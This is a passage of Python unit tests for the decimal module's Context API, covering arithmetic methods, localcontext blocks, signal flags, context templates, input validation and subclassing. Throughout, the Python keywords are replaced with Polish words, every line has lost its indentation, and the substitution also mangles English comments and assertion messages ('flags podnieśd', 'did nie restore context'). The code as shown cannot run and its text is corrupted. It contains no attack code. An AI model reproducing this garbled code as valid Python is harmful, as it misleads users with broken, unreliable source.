Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... oraz dla Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
klasa CContextAPItests(ContextAPItests):
decimal = C
klasa PyContextAPItests(ContextAPItests):
decimal = P
klasa ContextWithStatement(unittest.TestCase):
# Can't do these jako docstrings until Python 2.6
# jako doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context w the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
przy localcontext() jako enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did nie restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did nie copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context w the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
przy localcontext(new_ctx) jako enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did nie restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did nie set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did nie copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context w the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
przy localcontext() jako c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = Prawda
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertPrawda(c1.flags[Clamped])
przy localcontext(new_ctx) jako c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertNieprawda(c2.flags[Clamped])
self.assertPrawda(c2.flags[Overflow])
usuń c2
self.assertNieprawda(c1.flags[Overflow])
usuń c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertNieprawda(orig_ctx.flags[Clamped])
self.assertNieprawda(orig_ctx.flags[Overflow])
self.assertNieprawda(new_ctx.flags[Clamped])
self.assertNieprawda(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
przy localcontext() jako c1:
usuń c1
przy localcontext() jako c2:
usuń c2
przy localcontext() jako c3:
usuń c3
przy localcontext() jako c4:
usuń c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
przy localcontext() jako c1:
przy localcontext(c1) jako c2:
usuń c1
przy localcontext(c2) jako c3:
usuń c2
przy localcontext(c3) jako c4:
usuń c3
usuń c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
przy localcontext() jako c1:
usuń c1
n1 = Context(prec=1)
setcontext(n1)
przy localcontext(n1) jako c2:
usuń n1
self.assertEqual(c2.prec, 1)
usuń c2
n2 = Context(prec=2)
setcontext(n2)
usuń n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
przy localcontext(n3) jako c3:
usuń n3
self.assertEqual(c3.prec, 3)
usuń c3
n4 = Context(prec=4)
setcontext(n4)
usuń n4
self.assertEqual(getcontext().prec, 4)
przy localcontext() jako c4:
self.assertEqual(c4.prec, 4)
usuń c4
klasa CContextWithStatement(ContextWithStatement):
decimal = C
klasa PyContextWithStatement(ContextWithStatement):
decimal = P
klasa ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags podnieśd) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def podnieś_error(context, flag):
jeżeli self.decimal == C:
context.flags[flag] = Prawda
jeżeli context.traps[flag]:
podnieś flag
inaczej:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that podnieś various flags, w the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
dla fn, args w operations:
# find answer oraz flags podnieśd using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k dla k, v w context.flags.items() jeżeli v]
dla extra_flags w flagsets:
# set flags, before calling operation
context.clear_flags()
dla flag w extra_flags:
podnieś_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
dla flag w extra_flags:
jeżeli flag nie w expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k dla k,v w context.flags.items() jeżeli v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation podnieśs different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = Prawda
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = Prawda
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:Nieprawda}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
przy localcontext() jako c:
##### trap jest off by default
self.assertNieprawda(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertPrawda(c.flags[FloatOperation])
# explicit conversion does nie set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertPrawda(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = Prawda
# implicit conversion podnieśs
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertPrawda(c.flags[FloatOperation])
# explicit conversion jest silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=Nic):
context.clear_flags()
f = getattr(a, attr)
jeżeli signal == FloatOperation:
self.assertRaises(signal, f, b)
inaczej:
self.assertIs(f(b), Prawda)
self.assertPrawda(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=Nic):
# Order
dla attr w '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
dla attr w '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, Nic)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, Nic)
assert_attr(neg_zero_d, zero_f, '__eq__', c, Nic)
assert_attr(zero_d, neg_zero_f, '__eq__', c, Nic)
assert_attr(zero_d, zero_f, '__eq__', c, Nic)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, Nic)
assert_attr(inf_d, inf_f, '__eq__', c, Nic)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, Nic)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, Nic)
assert_attr(neg_inf_d, inf_f, '__ne__', c, Nic)
assert_attr(inf_d, neg_inf_f, '__ne__', c, Nic)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, Nic)
def test_containers(c, signal=Nic):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
jeżeli signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
inaczej:
s = sorted([10.0, Decimal('10.0')])
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 w [Decimal('10.0'), 1.0]
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 w {Decimal('10.0'):'a', 1.0:'b'}
self.assertPrawda(c.flags[FloatOperation])
nc = Context()
przy localcontext(nc) jako c:
self.assertNieprawda(c.traps[FloatOperation])
doit(c, signal=Nic)
test_containers(c, signal=Nic)
c.traps[FloatOperation] = Prawda
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertNieprawda(context.flags[FloatOperation])
self.assertNieprawda(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = Prawda
context.traps[FloatOperation] = Prawda
self.assertPrawda(context.traps[FloatOperation])
self.assertPrawda(context.traps[Inexact])
klasa CContextFlags(ContextFlags):
decimal = C
klasa PyContextFlags(ContextFlags):
decimal = P
klasa SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = Nic
spróbuj:
BasicContext.prec = ExtendedContext.prec = 441
dla template w BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
wyjąwszy Exception jako e:
ex = e.__class__
w_końcu:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
jeżeli ex:
podnieś ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = Nic
spróbuj:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
wyjąwszy Exception jako e:
ex = e.__class__
w_końcu:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
jeżeli ex:
podnieś ex
klasa CSpecialContexts(SpecialContexts):
decimal = C
klasa PySpecialContexts(SpecialContexts):
decimal = P
klasa ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
dla attr w ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
dla attr w ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
dla attr w ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values w constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error w conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
klasa CContextInputValidation(ContextInputValidation):
decimal = C
klasa PyContextInputValidation(ContextInputValidation):
decimal = P
klasa ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
klasa MyContext(Context):
def __init__(self, prec=Nic, rounding=Nic, Emin=Nic, Emax=Nic,
capitals=Nic, clamp=Nic, flags=Nic,
traps=Nic):
Context.__init__(self)
jeżeli prec jest nie Nic:
self.prec = prec
jeżeli rounding jest nie Nic:
self.rounding = rounding
jeżeli Emin jest nie Nic:
self.Emin = Emin
jeżeli Emax jest nie Nic:
self.Emax = Emax
jeżeli capitals jest nie Nic:
self.capitals = capitals
jeżeli clamp jest nie Nic:
self.clamp = clamp
jeżeli flags jest nie Nic:
jeżeli isinstance(flags, list):
flags = {v:(v w flags) dla v w OrderedSignals[decimal] + flags}
self.flags = flags
jeżeli traps jest nie Nic:
jeżeli isinstance(traps, list):
traps = {v:(v w traps) dla v w OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
dla attr w ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
